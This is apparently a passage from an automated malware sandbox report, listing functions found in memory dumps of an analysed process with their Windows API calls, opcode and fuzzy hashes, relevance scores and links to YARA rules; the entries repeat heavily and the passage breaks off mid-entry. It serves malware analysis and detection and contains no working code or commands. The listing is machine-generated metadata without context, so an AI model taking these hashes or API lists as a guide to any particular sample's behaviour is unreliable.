RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: 0cbf03e9c2812fb69ff5ea38c045a27aa6f1103f32099d354d1c0bc5ceaabfd2
Instruction ID: 64de0d25d4b796b9ce63da11b11ab9ce07869abc5bd9e7d8b8279563ef3f9a4f
Opcode Fuzzy Hash: 0cbf03e9c2812fb69ff5ea38c045a27aa6f1103f32099d354d1c0bc5ceaabfd2
Instruction Fuzzy Hash: 5842F674A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740D07, Relevance: 15.6, APIs: 10, Instructions: 566windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: 1eee226dd07752eeb639825f9d5451dc38f131a70ade363ca8a0f5c4b077f3c5
Instruction ID: 98d73cfa9da34e9601ecdc1d2d66c92b22578d3fc5885baff59536409c823002
Opcode Fuzzy Hash: 1eee226dd07752eeb639825f9d5451dc38f131a70ade363ca8a0f5c4b077f3c5
Instruction Fuzzy Hash: D342F774A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740D45, Relevance: 15.6, APIs: 10, Instructions: 559windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: 7feffa3b697c79400e4346d1016622b21c3b36bcf9ea42e11d1e6cca234d8e0f
Instruction ID: 476659585b012896a87cc74c4fb4b18bf1bfb322244e0405a75a278d97fc40fb
Opcode Fuzzy Hash: 7feffa3b697c79400e4346d1016622b21c3b36bcf9ea42e11d1e6cca234d8e0f
Instruction Fuzzy Hash: A742F774A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740D83, Relevance: 15.6, APIs: 10, Instructions: 554windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: f09ca73a5664e2ea85396da0dc11e155c4520bb243546d90d14d14189bd9e942
Instruction ID: d7562e5f3f26a51327ef399ff508c756963eca2edd18c64a66a2510cbaaf31be
Opcode Fuzzy Hash: f09ca73a5664e2ea85396da0dc11e155c4520bb243546d90d14d14189bd9e942
Instruction Fuzzy Hash: 1242F774A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740DCA, Relevance: 15.5, APIs: 10, Instructions: 547windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: 82f346c17de9cb37f8421ca6fd334d14a64e13aa68754840d91b291ee71037fb
Instruction ID: 19f249c6f665157a6f346de6aaff08f386db3c26aceec025677128d4ebebfb68
Opcode Fuzzy Hash: 82f346c17de9cb37f8421ca6fd334d14a64e13aa68754840d91b291ee71037fb
Instruction Fuzzy Hash: 6642F774A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740E11, Relevance: 15.5, APIs: 10, Instructions: 538windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: 2539384a8efb55aa12fe419e9a11dcbddc21e206ad5c637e309578eff19e017d
Instruction ID: 0c7a2f69a43ce3522c619039d3648ff3c5c1f8cbc9c4833814b6c8fe3ce82f8a
Opcode Fuzzy Hash: 2539384a8efb55aa12fe419e9a11dcbddc21e206ad5c637e309578eff19e017d
Instruction Fuzzy Hash: 7E32F874A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740E4F, Relevance: 15.5, APIs: 10, Instructions: 531windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: 201321a7ac4e7eabc7290bc6dfcf363895838f2da844c5845bc697fcc6a1403e
Instruction ID: 16f7a82aa96f70f65df195e08501b01ec0256425481ad081ffe594caa0a7e71d
Opcode Fuzzy Hash: 201321a7ac4e7eabc7290bc6dfcf363895838f2da844c5845bc697fcc6a1403e
Instruction Fuzzy Hash: B4320974A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740E8D, Relevance: 15.5, APIs: 10, Instructions: 526windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: a336ffe3669727d8e55b036086b234349e71684bf16c4105606089034f91db4b
Instruction ID: b20098097d245691dd35bad582a67404d2d04e938346ce28d4ddf31aa8b92228
Opcode Fuzzy Hash: a336ffe3669727d8e55b036086b234349e71684bf16c4105606089034f91db4b
Instruction Fuzzy Hash: B0320874A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740ED4, Relevance: 15.5, APIs: 10, Instructions: 519windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: e35723d276fa8bc9f733db4582a48c2a788d2cc9205b29b4e99046e31f8f0015
Instruction ID: 1dc5a2df51ac97d76e916f1ba40425f1c4caeb7467c2a44440ca0497030f44c6
Opcode Fuzzy Hash: e35723d276fa8bc9f733db4582a48c2a788d2cc9205b29b4e99046e31f8f0015
Instruction Fuzzy Hash: 14320874A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740F1B, Relevance: 14.0, APIs: 9, Instructions: 512windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeThunk
String ID:
API String ID: 1640493320-0
Opcode ID: 805b7a06a48630d3e278182d8c6e91ba9579cd03c77b81f08ae520f33cb9a140
Instruction ID: e7a7834191e47ba7adcf6d5ea92db5746ab495557612c448076c9c262857262e
Opcode Fuzzy Hash: 805b7a06a48630d3e278182d8c6e91ba9579cd03c77b81f08ae520f33cb9a140
Instruction Fuzzy Hash: 7B321974A04228CFCB24AF70D8997ADB7B6BF49305F6085AAD509A7350DF349E82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02740F62, Relevance: 14.0, APIs: 9, Instructions: 503windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeThunk
String ID:
API String ID: 1640493320-0
Opcode ID: 0d9c1914c5eb707ac9df3559ec911d9132a419a1204afd21c18fc5c6e0dab6f5
Instruction ID: 86601465f7850446c525514d204970da4a0923837ae92fee341e366f762f8fa2
Opcode Fuzzy Hash: 0d9c1914c5eb707ac9df3559ec911d9132a419a1204afd21c18fc5c6e0dab6f5
Instruction Fuzzy Hash: 1C321974A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740FA0, Relevance: 14.0, APIs: 9, Instructions: 498windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeThunk
String ID:
API String ID: 1640493320-0
Opcode ID: 4952098ade8a97eee2455760e0cfcbe75bacc40019a7075d95eaef0f0189c939
Instruction ID: 580d078682e4aec084c4a3346dbb82292320a8e5a7e6ed26aa6029d8899ccff3
Opcode Fuzzy Hash: 4952098ade8a97eee2455760e0cfcbe75bacc40019a7075d95eaef0f0189c939
Instruction Fuzzy Hash: 2C321974A04228CFCB24AF74D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02740FE7, Relevance: 14.0, APIs: 9, Instructions: 491windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeThunk
String ID:
API String ID: 1640493320-0
Opcode ID: a8f8a92a3d06da271b75836b73933aea641dc3959900007f9ce70018b4b83eb7
Instruction ID: 2310e9bab1a174f3b54bef48b80b7adf649946454815b54f5836451f8c75d05d
Opcode Fuzzy Hash: a8f8a92a3d06da271b75836b73933aea641dc3959900007f9ce70018b4b83eb7
Instruction Fuzzy Hash: 462219B4A04228CFCB24AF74D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02876940, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 028769A0
GetCurrentThread.KERNEL32 ref: 028769DD
GetCurrentProcess.KERNEL32 ref: 02876A1A
GetCurrentThreadId.KERNEL32 ref: 02876A73

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2b87f1e5b72158ca88c45a7450d41228530a21804faa79cb73c5fe59a0d923bc
Instruction ID: 911600b16e2c67daf6e5f74a7a00d79065a2da7092be95f789040cd4ce48561a
Opcode Fuzzy Hash: 2b87f1e5b72158ca88c45a7450d41228530a21804faa79cb73c5fe59a0d923bc
Instruction Fuzzy Hash: B75147B4D046498FDB14CFAADA48BDEBBF5EF88314F208459E419A7350DB749884CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02741445, Relevance: 3.3, APIs: 2, Instructions: 325COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 17beca97fdfc977520df0ffd8fa15ef6bfc458c931c720bcde877225035581ca
Instruction ID: bbddb4d640f531bf3cb0d6c6dfa404eee0a4e99a2aeca543efb9ad1e4c1e1361
Opcode Fuzzy Hash: 17beca97fdfc977520df0ffd8fa15ef6bfc458c931c720bcde877225035581ca
Instruction Fuzzy Hash: 94E10AB4A00228CBCB24AB70D8957A8B7B6BF49305F6045EED509A7340CF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0274148C, Relevance: 3.3, APIs: 2, Instructions: 318COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a8d505b65f7cd92fbd0ace5db96796e98a81dffef4ac81a69195786efcf3671e
Instruction ID: bd5a8667412615cbffdd93d2fb8b08b8438e09e2229e897c5f5d17fd1e70ba0f
Opcode Fuzzy Hash: a8d505b65f7cd92fbd0ace5db96796e98a81dffef4ac81a69195786efcf3671e
Instruction Fuzzy Hash: 1EE1FBB4A00228CBCB24AB74D8957A8B7B6BF49305F6045EED509A7340DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 027414D3, Relevance: 3.3, APIs: 2, Instructions: 311COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e37d1612da56ebbf4479b549c08699e316ee357ec77e4416b7c5dbc0ce37cf04
Instruction ID: 7e279095403ed5381d697e552a1a6012204835dabb0379b1ba5d94b0a6a1eb11
Opcode Fuzzy Hash: e37d1612da56ebbf4479b549c08699e316ee357ec77e4416b7c5dbc0ce37cf04
Instruction Fuzzy Hash: 09E10CB4A00219CBCB24AF70D8857A8B7B6BF49305F6045EED509A7340DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0274151D, Relevance: 3.3, APIs: 2, Instructions: 304COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ec651895dd074796a2528aa6446383e8b0ffe829b03f793cb21ddf55a4b218b4
Instruction ID: 2fe918517699b6cdb82b47dfc754b61fb263d92ea74547e656f4f729d9ba78a4
Opcode Fuzzy Hash: ec651895dd074796a2528aa6446383e8b0ffe829b03f793cb21ddf55a4b218b4
Instruction Fuzzy Hash: 2FE10CB4A00219CBCB24AF70D8857A8B7B6BF88305F6045EED509A7340DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0274157D, Relevance: 1.8, APIs: 1, Instructions: 293COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9901489b9a98db4ad59eb86ebd61f7c13ca7e976c1a6104a2a6bb91358747a63
Instruction ID: fe3a16f66858e79c599504fe51c408d2f53e358d385d1b0dd2411a30b4d590b4
Opcode Fuzzy Hash: 9901489b9a98db4ad59eb86ebd61f7c13ca7e976c1a6104a2a6bb91358747a63
Instruction Fuzzy Hash: 11D10BB4A01219CBCB24AF74D8857A8B7B6BF48305F6045EED609A7340DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 027415C7, Relevance: 1.8, APIs: 1, Instructions: 286COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d4948d28bfc8959f4aa08363969f44a7a78774bc68ddbd3a508ef1c8f891c81f
Instruction ID: 82c08439a27d3f58b10cd034f75e0bd53135fdb03df1a8e628bcf69c81437815
Opcode Fuzzy Hash: d4948d28bfc8959f4aa08363969f44a7a78774bc68ddbd3a508ef1c8f891c81f
Instruction Fuzzy Hash: F4D10CB4A00219CBCB24AB70D885769B7B6BF48305F6045EED60DA7340DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02741611, Relevance: 1.8, APIs: 1, Instructions: 279COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9626ec9872b232a2f6f8a6e324730fcc94d66190c2c11f38c28a4dbf9e75377b
Instruction ID: 5edfef0aad7b3cc4abcc17b86657f822d79adebca376da0862cd381e4eeda9f4
Opcode Fuzzy Hash: 9626ec9872b232a2f6f8a6e324730fcc94d66190c2c11f38c28a4dbf9e75377b
Instruction Fuzzy Hash: 52D10DB4A00219CBCB24AB74D885768B7B6BF88305F6045EDD60DA7340DF359E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0274165B, Relevance: 1.8, APIs: 1, Instructions: 272COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7e0f2829963129ff476abce54ecbda008b1e2e2f556eb80f9e52d4ef507d6e5f
Instruction ID: b4d9653602e66dedbd90f07bb0163b3323bfb89244e9fb0fe4571da00377abfe
Opcode Fuzzy Hash: 7e0f2829963129ff476abce54ecbda008b1e2e2f556eb80f9e52d4ef507d6e5f
Instruction Fuzzy Hash: B7C10DB4A00218CBCB24AB74D885769B7B6BF88305F6045EDD60DA7340DF359E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 027416A5, Relevance: 1.8, APIs: 1, Instructions: 265COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6f4718f7cfe69a5e6d805666debe6bb7d3dc7d61515637c3fd41c474bb4e7d85
Instruction ID: 2e89527d5b5c800470bca2a0cea689683898c26915268a936ce787c5cd77efd5
Opcode Fuzzy Hash: 6f4718f7cfe69a5e6d805666debe6bb7d3dc7d61515637c3fd41c474bb4e7d85
Instruction Fuzzy Hash: FFC10DB4A00218CBCB24AB74D8857A9B7B6BF88205F6045EDD609A7340DF359E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 027416EF, Relevance: 1.8, APIs: 1, Instructions: 258COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f93afb1a39b2040e3d7df9dda0c5ced0aa57b6dca7b7858b3ec5bf3621057cff
Instruction ID: 5c06dbb01b00eb1263a32aed0b62aa07193f455c6c59e73cb5a9f47a645ccf33
Opcode Fuzzy Hash: f93afb1a39b2040e3d7df9dda0c5ced0aa57b6dca7b7858b3ec5bf3621057cff
Instruction Fuzzy Hash: 06C10CB4A00218CBCB24AB74D8857ADB7B6BF88305F6045EDD609A7340DF359E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02741739, Relevance: 1.8, APIs: 1, Instructions: 251COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 614553ee911719afc79a766c7e0fc02311dd5686542fc2727ce3140214191a8a
Instruction ID: 0a2b3c4d47e692e65ec1e40b8c83efcc2e46684a9d2d0baae2938454fc552934
Opcode Fuzzy Hash: 614553ee911719afc79a766c7e0fc02311dd5686542fc2727ce3140214191a8a
Instruction Fuzzy Hash: CEB11DB4A01218CBCB24AB74C8857ADB7B6AF88205F6045EDD609A7340DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02741783, Relevance: 1.7, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6a3719982c3a78d7625bd66813e064dc82eb7b152e7b7d4586d89e25e4fef5b6
Instruction ID: d632ad9c63133a8aa316a72ee196c288f98b865413df20f4dccdc4be97f90c2b
Opcode Fuzzy Hash: 6a3719982c3a78d7625bd66813e064dc82eb7b152e7b7d4586d89e25e4fef5b6
Instruction Fuzzy Hash: 7DB10CB4A00228CBCB24AB74C8957ADB7B6BF88305F6045E9D50DA7340DF359E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 027417CD, Relevance: 1.7, APIs: 1, Instructions: 237COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 05a03108aa1d20ea9bb8691b4b4f9b3be486bfd81dd51c53b1b386f222750f95
Instruction ID: 9481964ba07cf868136ca2d1ecdc02a785f54de633305e715a578afb4a6eb584
Opcode Fuzzy Hash: 05a03108aa1d20ea9bb8691b4b4f9b3be486bfd81dd51c53b1b386f222750f95
Instruction Fuzzy Hash: 69A11DB4A002288FCB24AB74D8957ADB7B6AF88205F6045EDD50DA7340DF349E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 027027B8, Relevance: 1.7, APIs: 1, Instructions: 210libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02702849

Memory Dump Source

Source File: 00000002.00000002.920140320.0000000002700000.00000040.00000001.sdmp, Offset: 02700000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bcbc78fa52e8ed8302a117da57e05a1e778249ca3a5ce3e8c2a3d58f0c35843
